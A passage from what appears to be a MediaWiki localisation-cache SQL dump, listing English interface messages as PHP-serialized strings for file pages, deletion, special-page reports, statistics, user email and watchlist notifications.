$1 page links}} to this file only.\nA [[Special:WhatLinksHere/$2|full list]] is available.\";'),('en','messages:nolinkstoimage','s:42:\"There are no pages that link to this file.\";'),('en','messages:morelinkstoimage','s:58:\"View [[Special:WhatLinksHere/$1|more links]] to this file.\";'),('en','messages:linkstoimage-redirect','s:21:\"$1 (file redirect) $2\";'),('en','messages:duplicatesoffile','s:135:\"The following {{PLURAL:$1|file is a duplicate|$1 files are duplicates}} of this file ([[Special:FileDuplicateSearch/$2|more details]]):\";'),('en','messages:sharedupload','s:55:\"This file is from $1 and may be used by other projects.\";'),('en','messages:sharedupload-desc-there','s:122:\"This file is from $1 and may be used by other projects.\nPlease see the [$2 file description page] for further information.\";'),('en','messages:sharedupload-desc-here','s:127:\"This file is from $1 and may be used by other projects.\nThe description on its [$2 file description page] there is shown below.\";'),('en','messages:sharedupload-desc-edit','s:135:\"This file is from $1 and may be used by other projects.\nMaybe you want to edit the description on its [$2 file description page] there.\";'),('en','messages:sharedupload-desc-create','s:135:\"This file is from $1 and may be used by other projects.\nMaybe you want to edit the description on its [$2 file description page] there.\";'),('en','messages:shareddescriptionfollows','s:1:\"-\";'),('en','messages:filepage-nofile','s:28:\"No file by this name exists.\";'),('en','messages:filepage-nofile-link','s:56:\"No file by this name exists, but you can [$1 upload it].\";'),('en','messages:uploadnewversion-linktext','s:33:\"Upload a new version of this file\";'),('en','messages:shared-repo-from','s:7:\"from $1\";'),('en','messages:shared-repo','s:19:\"a shared repository\";'),('en','messages:shared-repo-name-wikimediacommons','s:17:\"Wikimedia Commons\";'),('en','messages:filepage.css','s:101:\"/* CSS placed here is included on the file description page, also included on foreign client wikis */\";'),('en','messages:upload-disallowed-here','s:31:\"You cannot overwrite this file.\";'),('en','messages:filerevert','s:9:\"Revert $1\";'),('en','messages:filerevert-legend','s:11:\"Revert file\";'),('en','messages:filerevert-intro','s:99:\"You are about to revert the file [[Media:$1|$1]] to the [$4 version as of $3, $2].\";'),('en','messages:filerevert-comment','s:7:\"Reason:\";'),('en','messages:filerevert-defaultcomment','s:32:\"Reverted to version as of $2, $1\";'),('en','messages:filerevert-submit','s:6:\"Revert\";'),('en','messages:filerevert-success','s:84:\"[[Media:$1|$1]] has been reverted to the [$4 version as of $3, $2].\";'),('en','messages:filerevert-badversion','s:76:\"There is no previous local version of this file with the provided timestamp.\";'),('en','messages:filedelete','s:9:\"Delete $1\";'),('en','messages:filedelete-legend','s:11:\"Delete file\";'),('en','messages:filedelete-intro','s:96:\"You are about to delete the file [[Media:$1|$1]] along with all of its history.\";'),('en','messages:filedelete-intro-old','s:83:\"You are deleting the version of [[Media:$1|$1]] as of [$4 $3, $2].\";'),('en','messages:filedelete-comment','s:7:\"Reason:\";'),('en','messages:filedelete-submit','s:6:\"Delete\";'),('en','messages:filedelete-success','s:37:\"$1 has been deleted.\";'),('en','messages:filedelete-success-old','s:78:\"The version of [[Media:$1|$1]] as of $3, $2 has been deleted.\";'),('en','messages:filedelete-nofile','s:35:\"$1 does not exist.\";'),('en','messages:filedelete-nofile-old','s:82:\"There is no archived version of $1 with the specified attributes.\";'),('en','messages:filedelete-otherreason','s:24:\"Other/additional reason:\";'),('en','messages:filedelete-reason-otherlist','s:12:\"Other reason\";'),('en','messages:filedelete-reason-dropdown','s:64:\"*Common delete reasons\n** Copyright violation\n** Duplicated file\";'),('en','messages:filedelete-edit-reasonlist','s:19:\"Edit delete reasons\";'),('en','messages:filedelete-maintenance','s:74:\"Deletion and restoration of files temporarily disabled during maintenance.\";'),('en','messages:filedelete-maintenance-title','s:18:\"Cannot delete file\";'),('en','messages:mimesearch','s:11:\"MIME search\";'),('en','messages:mimesearch-summary','s:136:\"This page enables the filtering of files for their MIME type.\nInput: contenttype/subtype or contenttype/*, e.g. image/jpeg.\";'),('en','messages:mimetype','s:10:\"MIME type:\";'),('en','messages:download','s:8:\"download\";'),('en','messages:unwatchedpages','s:15:\"Unwatched pages\";'),('en','messages:unwatchedpages-summary','s:0:\"\";'),('en','messages:listredirects','s:17:\"List of redirects\";'),('en','messages:listredirects-summary','s:0:\"\";'),('en','messages:listduplicatedfiles','s:29:\"List of files with duplicates\";'),('en','messages:listduplicatedfiles-summary','s:160:\"This is a list of files where the most recent version of the file is a duplicate of the most recent version of some other file. Only local files are considered.\";'),('en','messages:listduplicatedfiles-entry','s:67:\"[[:File:$1|$1]] has [[$3|{{PLURAL:$2|a duplicate|$2 duplicates}}]].\";'),('en','messages:unusedtemplates','s:16:\"Unused templates\";'),('en','messages:unusedtemplates-summary','s:0:\"\";'),('en','messages:unusedtemplatestext','s:170:\"This page lists all pages in the {{ns:template}} namespace that are not included in another page.\nRemember to check for other links to the templates before deleting them.\";'),('en','messages:unusedtemplateswlh','s:11:\"other links\";'),('en','messages:randompage','s:11:\"Random page\";'),('en','messages:randompage-nopages','s:75:\"There are no pages in the following {{PLURAL:$2|namespace|namespaces}}: $1.\";'),('en','messages:randompage-url','s:14:\"Special:Random\";'),('en','messages:randomincategory','s:23:\"Random page in category\";'),('en','messages:randomincategory-invalidcategory','s:34:\"\"$1\" is not a valid category name.\";'),('en','messages:randomincategory-nopages','s:55:\"There are no pages in the [[:Category:$1|$1]] category.\";'),('en','messages:randomincategory-category','s:9:\"Category:\";'),('en','messages:randomincategory-legend','s:23:\"Random page in category\";'),('en','messages:randomredirect','s:15:\"Random redirect\";'),('en','messages:randomredirect-nopages','s:45:\"There are no redirects in the namespace \"$1\".\";'),('en','messages:statistics','s:10:\"Statistics\";'),('en','messages:statistics-summary','s:0:\"\";'),('en','messages:statistics-header-pages','s:15:\"Page statistics\";'),('en','messages:statistics-header-edits','s:15:\"Edit statistics\";'),('en','messages:statistics-header-views','s:15:\"View statistics\";'),('en','messages:statistics-header-users','s:15:\"User statistics\";'),('en','messages:statistics-header-hooks','s:16:\"Other statistics\";'),('en','messages:statistics-articles','s:13:\"Content pages\";'),('en','messages:statistics-pages','s:5:\"Pages\";'),('en','messages:statistics-pages-desc','s:60:\"All pages in the wiki, including talk pages, redirects, etc.\";'),('en','messages:statistics-files','s:14:\"Uploaded files\";'),('en','messages:statistics-edits','s:40:\"Page edits since {{SITENAME}} was set up\";'),('en','messages:statistics-edits-average','s:22:\"Average edits per page\";'),('en','messages:statistics-views-total','s:11:\"Views total\";'),('en','messages:statistics-views-total-desc','s:62:\"Views to non-existing pages and special pages are not included\";'),('en','messages:statistics-views-peredit','s:14:\"Views per edit\";'),('en','messages:statistics-users','s:38:\"Registered [[Special:ListUsers|users]]\";'),('en','messages:statistics-users-active','s:12:\"Active users\";'),('en','messages:statistics-users-active-desc','s:72:\"Users who have performed an action in the last {{PLURAL:$1|day|$1 days}}\";'),('en','messages:statistics-mostpopular','s:17:\"Most viewed pages\";'),('en','messages:statistics-footer','s:0:\"\";'),('en','messages:pageswithprop','s:26:\"Pages with a page property\";'),('en','messages:pageswithprop-summary','s:0:\"\";'),('en','messages:pageswithprop-legend','s:26:\"Pages with a page property\";'),('en','messages:pageswithprop-text','s:58:\"This page lists pages that use a particular page property.\";'),('en','messages:pageswithprop-prop','s:14:\"Property name:\";'),('en','messages:pageswithprop-submit','s:2:\"Go\";'),('en','messages:pageswithprop-prophidden-long','s:36:\"long text property value hidden ($1)\";'),('en','messages:pageswithprop-prophidden-binary','s:33:\"binary property value hidden ($1)\";'),('en','messages:doubleredirects','s:16:\"Double redirects\";'),('en','messages:doubleredirects-summary','s:0:\"\";'),('en','messages:doubleredirectstext','s:295:\"This page lists pages that redirect to other redirect pages.\nEach row contains links to the first and second redirect, as well as the target of the second redirect, which is usually the \"real\" target page to which the first redirect should point.\nCrossed out entries have been solved.\";'),('en','messages:double-redirect-fixed-move','s:83:\"[[$1]] has been moved.\nIt was automatically updated and now it redirects to [[$2]].\";'),('en','messages:double-redirect-fixed-maintenance','s:80:\"Automatically fixing double redirect from [[$1]] to [[$2]] in a maintenance job.\";'),('en','messages:double-redirect-fixer','s:14:\"Redirect fixer\";'),('en','messages:brokenredirects','s:16:\"Broken redirects\";'),('en','messages:brokenredirects-summary','s:0:\"\";'),('en','messages:brokenredirectstext','s:51:\"The following redirects link to non-existent pages:\";'),('en','messages:brokenredirects-edit','s:4:\"edit\";'),('en','messages:brokenredirects-delete','s:6:\"delete\";'),('en','messages:withoutinterwiki','s:28:\"Pages without language links\";'),('en','messages:withoutinterwiki-summary','s:59:\"The following pages do not link to other language versions.\";'),('en','messages:withoutinterwiki-legend','s:6:\"Prefix\";'),('en','messages:withoutinterwiki-submit','s:4:\"Show\";'),('en','messages:fewestrevisions','s:31:\"Pages with the fewest revisions\";'),('en','messages:fewestrevisions-summary','s:0:\"\";'),('en','messages:nbytes','s:27:\"$1 {{PLURAL:$1|byte|bytes}}\";'),('en','messages:ncategories','s:36:\"$1 {{PLURAL:$1|category|categories}}\";'),('en','messages:ninterwikis','s:37:\"$1 {{PLURAL:$1|interwiki|interwikis}}\";'),('en','messages:nlinks','s:27:\"$1 {{PLURAL:$1|link|links}}\";'),('en','messages:nmembers','s:31:\"$1 {{PLURAL:$1|member|members}}\";'),('en','messages:nmemberschanged','s:38:\"$1 → $2 {{PLURAL:$2|member|members}}\";'),('en','messages:nrevisions','s:35:\"$1 {{PLURAL:$1|revision|revisions}}\";'),('en','messages:nviews','s:27:\"$1 {{PLURAL:$1|view|views}}\";'),('en','messages:nimagelinks','s:35:\"Used on $1 {{PLURAL:$1|page|pages}}\";'),('en','messages:ntransclusions','s:35:\"used on $1 {{PLURAL:$1|page|pages}}\";'),('en','messages:specialpage-empty','s:37:\"There are no results for this report.\";'),('en','messages:lonelypages','s:14:\"Orphaned pages\";'),('en','messages:lonelypages-summary','s:0:\"\";'),('en','messages:lonelypagestext','s:88:\"The following pages are not linked from or transcluded into other pages in {{SITENAME}}.\";'),('en','messages:uncategorizedpages','s:19:\"Uncategorized pages\";'),('en','messages:uncategorizedpages-summary','s:0:\"\";'),('en','messages:uncategorizedcategories','s:24:\"Uncategorized categories\";'),('en','messages:uncategorizedcategories-summary','s:0:\"\";'),('en','messages:uncategorizedimages','s:19:\"Uncategorized files\";'),('en','messages:uncategorizedimages-summary','s:0:\"\";'),('en','messages:uncategorizedtemplates','s:23:\"Uncategorized templates\";'),('en','messages:uncategorizedtemplates-summary','s:0:\"\";'),('en','messages:unusedcategories','s:17:\"Unused categories\";'),('en','messages:unusedcategories-summary','s:0:\"\";'),('en','messages:unusedimages','s:12:\"Unused files\";'),('en','messages:unusedimages-summary','s:0:\"\";'),('en','messages:popularpages','s:13:\"Popular pages\";'),('en','messages:popularpages-summary','s:0:\"\";'),('en','messages:wantedcategories','s:17:\"Wanted categories\";'),('en','messages:wantedcategories-summary','s:0:\"\";'),('en','messages:wantedpages','s:12:\"Wanted pages\";'),('en','messages:wantedpages-summary','s:0:\"\";'),('en','messages:wantedpages-badtitle','s:31:\"Invalid title in result set: $1\";'),('en','messages:wantedfiles','s:12:\"Wanted files\";'),('en','messages:wantedfiles-summary','s:0:\"\";'),('en','messages:wantedfiletext-cat','s:244:\"The following files are used but do not exist. Files from foreign repositories may be listed despite existing. Any such false positives will be struck out. Additionally, pages that embed files that do not exist are listed in [[:$1]].\";'),('en','messages:wantedfiletext-cat-noforeign','s:124:\"The following files are used but do not exist. Additionally, pages that embed files that do not exist are listed in [[:$1]].\";'),('en','messages:wantedfiletext-nocat','s:166:\"The following files are used but do not exist. Files from foreign repositories may be listed despite existing. Any such false positives will be struck out.\";'),('en','messages:wantedfiletext-nocat-noforeign','s:46:\"The following files are used but do not exist.\";'),('en','messages:wantedtemplates','s:16:\"Wanted templates\";'),('en','messages:wantedtemplates-summary','s:0:\"\";'),('en','messages:mostlinked','s:20:\"Most linked-to pages\";'),('en','messages:mostlinked-summary','s:0:\"\";'),('en','messages:mostlinkedcategories','s:25:\"Most linked-to categories\";'),('en','messages:mostlinkedcategories-summary','s:0:\"\";'),('en','messages:mostlinkedtemplates','s:22:\"Most transcluded pages\";'),('en','messages:mostlinkedtemplates-summary','s:0:\"\";'),('en','messages:mostcategories','s:30:\"Pages with the most categories\";'),('en','messages:mostcategories-summary','s:0:\"\";'),('en','messages:mostimages','s:20:\"Most linked-to files\";'),('en','messages:mostimages-summary','s:0:\"\";'),('en','messages:mostinterwikis','s:30:\"Pages with the most interwikis\";'),('en','messages:mostinterwikis-summary','s:0:\"\";'),('en','messages:mostrevisions','s:29:\"Pages with the most revisions\";'),('en','messages:mostrevisions-summary','s:0:\"\";'),('en','messages:prefixindex','s:21:\"All pages with prefix\";'),('en','messages:prefixindex-namespace','s:36:\"All pages with prefix ($1 namespace)\";'),('en','messages:prefixindex-summary','s:0:\"\";'),('en','messages:prefixindex-strip','s:20:\"Strip prefix in list\";'),('en','messages:shortpages','s:11:\"Short pages\";'),('en','messages:shortpages-summary','s:0:\"\";'),('en','messages:longpages','s:10:\"Long pages\";'),('en','messages:longpages-summary','s:0:\"\";'),('en','messages:deadendpages','s:14:\"Dead-end pages\";'),('en','messages:deadendpages-summary','s:0:\"\";'),('en','messages:deadendpagestext','s:63:\"The following pages do not link to other pages in {{SITENAME}}.\";'),('en','messages:protectedpages','s:15:\"Protected pages\";'),('en','messages:protectedpages-indef','s:27:\"Indefinite protections only\";'),('en','messages:protectedpages-summary','s:177:\"This page lists existing pages that are currently protected. For a list of titles that are protected from creation, see [[{{#special:ProtectedTitles}}|{{int:protectedtitles}}]].\";'),('en','messages:protectedpages-cascade','s:26:\"Cascading protections only\";'),('en','messages:protectedpages-noredirect','s:14:\"Hide redirects\";'),('en','messages:protectedpagesempty','s:55:\"No pages are currently protected with these parameters.\";'),('en','messages:protectedpages-timestamp','s:9:\"Timestamp\";'),('en','messages:protectedpages-page','s:4:\"Page\";'),('en','messages:protectedpages-expiry','s:7:\"Expires\";'),('en','messages:protectedpages-performer','s:15:\"Protecting user\";'),('en','messages:protectedpages-params','s:21:\"Protection parameters\";'),('en','messages:protectedpages-reason','s:6:\"Reason\";'),('en','messages:protectedpages-unknown-timestamp','s:7:\"Unknown\";'),('en','messages:protectedpages-unknown-performer','s:12:\"Unknown user\";'),('en','messages:protectedpages-unknown-reason','s:3:\"—\";'),('en','messages:protectedtitles','s:16:\"Protected titles\";'),('en','messages:protectedtitles-summary','s:175:\"This page lists titles that are currently protected from creation. For a list of existing pages that are protected, see [[{{#special:ProtectedPages}}|{{int:protectedpages}}]].\";'),('en','messages:protectedtitlesempty','s:56:\"No titles are currently protected with these parameters.\";'),('en','messages:listusers','s:9:\"User list\";'),('en','messages:listusers-summary','s:0:\"\";'),('en','messages:listusers-editsonly','s:26:\"Show only users with edits\";'),('en','messages:listusers-creationsort','s:21:\"Sort by creation date\";'),('en','messages:listusers-desc','s:24:\"Sort in descending order\";'),('en','messages:usereditcount','s:27:\"$1 {{PLURAL:$1|edit|edits}}\";'),('en','messages:usercreated','s:33:\"{{GENDER:$3|Created}} on $1 at $2\";'),('en','messages:newpages','s:9:\"New pages\";'),('en','messages:newpages-summary','s:0:\"\";'),('en','messages:newpages-username','s:9:\"Username:\";'),('en','messages:ancientpages','s:12:\"Oldest pages\";'),('en','messages:ancientpages-summary','s:0:\"\";'),('en','messages:move','s:4:\"Move\";'),('en','messages:movethispage','s:14:\"Move this page\";'),('en','messages:unusedimagestext','s:191:\"The following files exist but are not embedded in any page.\nPlease note that other web sites may link to a file with a direct URL, and so may still be listed here despite being in active use.\";'),('en','messages:unusedcategoriestext','s:89:\"The following category pages exist, although no other page or category makes use of them.\";'),('en','messages:notargettitle','s:9:\"No target\";'),('en','messages:notargettext','s:73:\"You have not specified a target page or user to perform this function on.\";'),('en','messages:nopagetitle','s:19:\"No such target page\";'),('en','messages:nopagetext','s:50:\"The target page you have specified does not exist.\";'),('en','messages:pager-newer-n','s:30:\"{{PLURAL:$1|newer 1|newer $1}}\";'),('en','messages:pager-older-n','s:30:\"{{PLURAL:$1|older 1|older $1}}\";'),('en','messages:suppress','s:9:\"Oversight\";'),('en','messages:querypage-disabled','s:54:\"This special page is disabled for performance reasons.\";'),('en','messages:booksources','s:12:\"Book sources\";'),('en','messages:booksources-summary','s:0:\"\";'),('en','messages:booksources-search-legend','s:23:\"Search for book sources\";'),('en','messages:booksources-isbn','s:5:\"ISBN:\";'),('en','messages:booksources-go','s:2:\"Go\";'),('en','messages:booksources-text','s:140:\"Below is a list of links to other sites that sell new and used books, and may also have further information about books you are looking for:\";'),('en','messages:booksources-invalid-isbn','s:94:\"The given ISBN does not appear to be valid; check for errors copying from the original source.\";'),('en','messages:rfcurl','s:27:\"//tools.ietf.org/html/rfc$1\";'),('en','messages:pubmedurl','s:46:\"//www.ncbi.nlm.nih.gov/pubmed/$1?dopt=Abstract\";'),('en','messages:specialloguserlabel','s:10:\"Performer:\";'),('en','messages:speciallogtitlelabel','s:23:\"Target (title or user):\";'),('en','messages:log','s:4:\"Logs\";'),('en','messages:all-logs-page','s:15:\"All public logs\";'),('en','messages:alllogstext','s:184:\"Combined display of all available logs of {{SITENAME}}.\nYou can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).\";'),('en','messages:logempty','s:25:\"No matching items in log.\";'),('en','messages:log-title-wildcard','s:37:\"Search titles starting with this text\";'),('en','messages:showhideselectedlogentries','s:41:\"Change visibility of selected log entries\";'),('en','messages:allpages','s:9:\"All pages\";'),('en','messages:allpages-summary','s:0:\"\";'),('en','messages:nextpage','s:14:\"Next page ($1)\";'),('en','messages:prevpage','s:18:\"Previous page ($1)\";'),('en','messages:allpagesfrom','s:26:\"Display pages starting at:\";'),('en','messages:allpagesto','s:24:\"Display pages ending at:\";'),('en','messages:allarticles','s:9:\"All pages\";'),('en','messages:allinnamespace','s:24:\"All pages ($1 namespace)\";'),('en','messages:allpagessubmit','s:2:\"Go\";'),('en','messages:allpagesprefix','s:26:\"Display pages with prefix:\";'),('en','messages:allpagesbadtitle','s:148:\"The given page title was invalid or had an inter-language or inter-wiki prefix.\nIt may contain one or more characters that cannot be used in titles.\";'),('en','messages:allpages-bad-ns','s:42:\"{{SITENAME}} does not have namespace \"$1\".\";'),('en','messages:allpages-hide-redirects','s:14:\"Hide redirects\";'),('en','messages:cachedspecial-viewing-cached-ttl','s:73:\"You are viewing a cached version of this page, which can be up to $1 old.\";'),('en','messages:cachedspecial-viewing-cached-ts','s:84:\"You are viewing a cached version of this page, which might not be completely actual.\";'),('en','messages:cachedspecial-refresh-now','s:12:\"View latest.\";'),('en','messages:categories','s:10:\"Categories\";'),('en','messages:categories-summary','s:0:\"\";'),('en','messages:categoriespagetext','s:204:\"The following {{PLURAL:$1|category contains|categories contain}} pages or media.\n[[Special:UnusedCategories|Unused categories]] are not shown here.\nAlso see [[Special:WantedCategories|wanted categories]].\";'),('en','messages:categoriesfrom','s:31:\"Display categories starting at:\";'),('en','messages:special-categories-sort-count','s:13:\"sort by count\";'),('en','messages:special-categories-sort-abc','s:19:\"sort alphabetically\";'),('en','messages:deletedcontributions','s:26:\"Deleted user contributions\";'),('en','messages:deletedcontributions-summary','s:0:\"\";'),('en','messages:deletedcontributions-title','s:26:\"Deleted user contributions\";'),('en','messages:sp-deletedcontributions-contribs','s:13:\"contributions\";'),('en','messages:linksearch','s:21:\"External links search\";'),('en','messages:linksearch-summary','s:0:\"\";'),('en','messages:linksearch-pat','s:15:\"Search pattern:\";'),('en','messages:linksearch-ns','s:10:\"Namespace:\";'),('en','messages:linksearch-ok','s:6:\"Search\";'),('en','messages:linksearch-text','s:221:\"Wildcards such as \"*.wikipedia.org\" may be used.\nNeeds at least a top-level domain, for example \"*.org\".
                                                                \nSupported {{PLURAL:$2|protocol|protocols}}: $1 (defaults to http:// if no protocol is specified).\";'),('en','messages:linksearch-line','s:20:\"$1 is linked from $2\";'),('en','messages:linksearch-error','s:55:\"Wildcards may appear only at the start of the hostname.\";'),('en','messages:listusersfrom','s:26:\"Display users starting at:\";'),('en','messages:listusers-submit','s:4:\"Show\";'),('en','messages:listusers-noresult','s:14:\"No user found.\";'),('en','messages:listusers-blocked','s:9:\"(blocked)\";'),('en','messages:activeusers','s:17:\"Active users list\";'),('en','messages:activeusers-summary','s:0:\"\";'),('en','messages:activeusers-intro','s:96:\"This is a list of users who had some kind of activity within the last $1 {{PLURAL:$1|day|days}}.\";'),('en','messages:activeusers-count','s:69:\"$1 {{PLURAL:$1|action|actions}} in the last {{PLURAL:$3|day|$3 days}}\";'),('en','messages:activeusers-from','s:26:\"Display users starting at:\";'),('en','messages:activeusers-hidebots','s:9:\"Hide bots\";'),('en','messages:activeusers-hidesysops','s:19:\"Hide administrators\";'),('en','messages:activeusers-noresult','s:15:\"No users found.\";'),('en','messages:listgrouprights','s:17:\"User group rights\";'),('en','messages:listgrouprights-summary','s:201:\"The following is a list of user groups defined on this wiki, with their associated access rights.\nThere may be [[{{MediaWiki:Listgrouprights-helppage}}|additional information]] about individual rights.\";'),('en','messages:listgrouprights-key','s:129:\"Legend:\n* Granted right\n* Revoked right\";'),('en','messages:listgrouprights-group','s:5:\"Group\";'),('en','messages:listgrouprights-rights','s:6:\"Rights\";'),('en','messages:listgrouprights-helppage','s:17:\"Help:Group rights\";'),('en','messages:listgrouprights-members','s:17:\"(list of members)\";'),('en','messages:listgrouprights-right-display','s:65:\"$1 ($2)\";'),('en','messages:listgrouprights-right-revoked','s:65:\"$1 ($2)\";'),('en','messages:listgrouprights-addgroup','s:34:\"Add {{PLURAL:$2|group|groups}}: $1\";'),('en','messages:listgrouprights-removegroup','s:37:\"Remove {{PLURAL:$2|group|groups}}: $1\";'),('en','messages:listgrouprights-addgroup-all','s:14:\"Add all groups\";'),('en','messages:listgrouprights-removegroup-all','s:17:\"Remove all groups\";'),('en','messages:listgrouprights-addgroup-self','s:49:\"Add {{PLURAL:$2|group|groups}} to own account: $1\";'),('en','messages:listgrouprights-removegroup-self','s:54:\"Remove {{PLURAL:$2|group|groups}} from own account: $1\";'),('en','messages:listgrouprights-addgroup-self-all','s:29:\"Add all groups to own account\";'),('en','messages:listgrouprights-removegroup-self-all','s:34:\"Remove all groups from own account\";'),('en','messages:listgrouprights-namespaceprotection-header','s:22:\"Namespace restrictions\";'),('en','messages:listgrouprights-namespaceprotection-namespace','s:9:\"Namespace\";'),('en','messages:listgrouprights-namespaceprotection-restrictedto','s:30:\"Right(s) allowing user to edit\";'),('en','messages:trackingcategories','s:19:\"Tracking categories\";'),('en','messages:trackingcategories-summary','s:191:\"This page lists tracking categories which are automatically populated by the MediaWiki software. Their names can be changed by altering the relevant system messages in the {{ns:8}} namespace.\";'),('en','messages:trackingcategories-msg','s:17:\"Tracking category\";'),('en','messages:trackingcategories-name','s:12:\"Message name\";'),('en','messages:trackingcategories-desc','s:27:\"Category inclusion criteria\";'),('en','messages:noindex-category-desc','s:161:\"The page is not indexed by robots because it has the magic word __NOINDEX__ on it and is in a namespace where that flag is allowed.\";'),('en','messages:index-category-desc','s:174:\"The page has a __INDEX__ on it (and is in a namespace where that flag is allowed), and hence is indexed by robots where it normally wouldn\'t be.\";'),('en','messages:post-expand-template-inclusion-category-desc','s:131:\"The page size is bigger than $wgMaxArticleSize after expanding all the templates, so some templates were not expanded.\";'),('en','messages:post-expand-template-argument-category-desc','s:149:\"The page is bigger than $wgMaxArticleSize after expanding a template argument (something in triple braces, like {{{Foo}}}).\";'),('en','messages:expensive-parserfunction-category-desc','s:214:\"The page uses too many expensive parser functions (like #ifexist). See [https://www.mediawiki.org/wiki/Special:MyLanguage/Manual:$wgExpensiveParserFunctionLimit Manual:$wgExpensiveParserFunctionLimit].\";'),('en','messages:broken-file-category-desc','s:91:\"The page contains a broken file link (a link to embed a file when the file does not exist).\";'),('en','messages:hidden-category-category-desc','s:167:\"The category contains __HIDDENCAT__ in its page content, which prevents it from showing up in the category links box on pages by default.\";'),('en','messages:trackingcategories-nodesc','s:25:\"No description available.\";'),('en','messages:trackingcategories-disabled','s:20:\"Category is disabled\";'),('en','messages:mailnologin','s:15:\"No send address\";'),('en','messages:mailnologintext','s:148:\"You must be [[Special:UserLogin|logged in]] and have a valid email address in your [[Special:Preferences|preferences]] to send email to other users.\";'),('en','messages:emailuser','s:15:\"Email this user\";'),('en','messages:emailuser-title-target','s:29:\"Email this {{GENDER:$1|user}}\";'),('en','messages:emailuser-title-notarget','s:10:\"Email user\";'),('en','messages:emailuser-summary','s:0:\"\";'),('en','messages:emailpage','s:10:\"Email user\";'),('en','messages:emailpagetext','s:262:\"You can use the form below to send an email message to this {{GENDER:$1|user}}.\nThe email address you entered in [[Special:Preferences|your user preferences]] will appear as the \"From\" address of the email, so the recipient will be able to reply directly to you.\";'),('en','messages:defemailsubject','s:33:\"{{SITENAME}} email from user \"$1\"\";'),('en','messages:usermaildisabled','s:19:\"User email disabled\";'),('en','messages:usermaildisabledtext','s:49:\"You cannot send email to other users on this wiki\";'),('en','messages:noemailtitle','s:16:\"No email address\";'),('en','messages:noemailtext','s:50:\"This user has not specified a valid email address.\";'),('en','messages:nowikiemailtext','s:59:\"This user has chosen not to receive email from other users.\";'),('en','messages:emailnotarget','s:47:\"Non-existent or invalid username for recipient.\";'),('en','messages:emailtarget','s:27:\"Enter username of recipient\";'),('en','messages:emailusername','s:9:\"Username:\";'),('en','messages:emailusernamesubmit','s:6:\"Submit\";'),('en','messages:email-legend','s:42:\"Send an email to another {{SITENAME}} user\";'),('en','messages:emailfrom','s:5:\"From:\";'),('en','messages:emailto','s:3:\"To:\";'),('en','messages:emailsubject','s:8:\"Subject:\";'),('en','messages:emailmessage','s:8:\"Message:\";'),('en','messages:emailsend','s:4:\"Send\";'),('en','messages:emailccme','s:30:\"Email me a copy of my message.\";'),('en','messages:emailccsubject','s:30:\"Copy of your message to $1: $2\";'),('en','messages:emailsent','s:10:\"Email sent\";'),('en','messages:emailsenttext','s:33:\"Your email message has been sent.\";'),('en','messages:emailuserfooter','s:77:\"This email was sent by $1 to $2 by the \"Email user\" function at {{SITENAME}}.\";'),('en','messages:usermessage-summary','s:23:\"Leaving system message.\";'),('en','messages:usermessage-editor','s:16:\"System messenger\";'),('en','messages:usermessage-template','s:21:\"MediaWiki:UserMessage\";'),('en','messages:watchlist','s:9:\"Watchlist\";'),('en','messages:watchlist-summary','s:0:\"\";'),('en','messages:mywatchlist','s:9:\"Watchlist\";'),('en','messages:watchlistfor2','s:9:\"For $1 $2\";'),('en','messages:nowatchlist','s:36:\"You have no items on your watchlist.\";'),('en','messages:watchlistanontext','s:54:\"Please log in to view or edit items on your watchlist.\";'),('en','messages:watchnologin','s:13:\"Not logged in\";'),('en','messages:addwatch','s:16:\"Add to watchlist\";'),('en','messages:addedwatchtext','s:153:\"The page \"[[:$1]]\" has been added to your [[Special:Watchlist|watchlist]].\nFuture changes to this page and its associated talk page will be listed there.\";'),('en','messages:addedwatchtext-short','s:47:\"The page \"$1\" has been added to your watchlist.\";'),('en','messages:removewatch','s:21:\"Remove from watchlist\";'),('en','messages:removedwatchtext','s:78:\"The page \"[[:$1]]\" has been removed from [[Special:Watchlist|your watchlist]].\";'),('en','messages:removedwatchtext-short','s:51:\"The page \"$1\" has been removed from your watchlist.\";'),('en','messages:watch','s:5:\"Watch\";'),('en','messages:watchthispage','s:15:\"Watch this page\";'),('en','messages:unwatch','s:7:\"Unwatch\";'),('en','messages:unwatchthispage','s:13:\"Stop watching\";'),('en','messages:notanarticle','s:18:\"Not a content page\";'),('en','messages:notvisiblerev','s:54:\"The last revision by a different user has been deleted\";'),('en','messages:watchlist-details','s:85:\"{{PLURAL:$1|$1 page|$1 pages}} on your watchlist, not separately counting talk pages.\";'),('en','messages:wlheader-enotif','s:30:\"Email notification is enabled.\";'),('en','messages:wlheader-showupdated','s:92:\"Pages that have been changed since you last visited them are shown in bold.\";'),('en','messages:wlnote','s:151:\"Below {{PLURAL:$1|is the last change|are the last $1 changes}} in the last {{PLURAL:$2|hour|$2 hours}}, as of $3, $4.\";'),('en','messages:wlshowlast','s:29:\"Show last $1 hours $2 days $3\";'),('en','messages:watchlist-options','s:17:\"Watchlist options\";'),('en','messages:watching','s:11:\"Watching...\";'),('en','messages:unwatching','s:13:\"Unwatching...\";'),('en','messages:watcherrortext','s:66:\"An error occurred while changing your watchlist settings for \"$1\".\";'),('en','messages:enotif_reset','s:22:\"Mark all pages visited\";'),('en','messages:enotif_impersonal_salutation','s:17:\"{{SITENAME}} user\";'),('en','messages:enotif_subject_deleted','s:57:\"{{SITENAME}} page $1 has been {{GENDER:$2|deleted}} by $2\";'),('en','messages:enotif_subject_created','s:57:\"{{SITENAME}} page $1 has been {{GENDER:$2|created}} by $2\";'),('en','messages:enotif_subject_moved','s:55:\"{{SITENAME}} page $1 has been {{GENDER:$2|moved}} by $2\";'),('en','messages:enotif_subject_restored','s:58:\"{{SITENAME}} page $1 has been {{GENDER:$2|restored}} by $2\";'),('en','messages:enotif_subject_changed','s:57:\"{{SITENAME}} page $1 has been {{GENDER:$2|changed}} by $2\";'),('en','messages:enotif_body_intro_deleted','s:87:\"The {{SITENAME}} page $1 has been {{GENDER:$2|deleted}} on $PAGEEDITDATE by $2, see $3.\";'),('en','messages:enotif_body_intro_created','s:112:\"The {{SITENAME}} page $1 has been {{GENDER:$2|created}} on $PAGEEDITDATE by $2, see $3 for the current revision.\";'),('en','messages:enotif_body_intro_moved','s:110:\"The {{SITENAME}} page $1 has been {{GENDER:$2|moved}} on $PAGEEDITDATE by $2, see $3 for the current revision.\";'),('en','messages:enotif_body_intro_restored','s:113:\"The {{SITENAME}} page $1 has been {{GENDER:$2|restored}} on $PAGEEDITDATE by $2, see $3 for the current revision.\";'),('en','messages:enotif_body_intro_changed','s:112:\"The {{SITENAME}} page $1 has been {{GENDER:$2|changed}} on $PAGEEDITDATE by $2, see $3 for the current 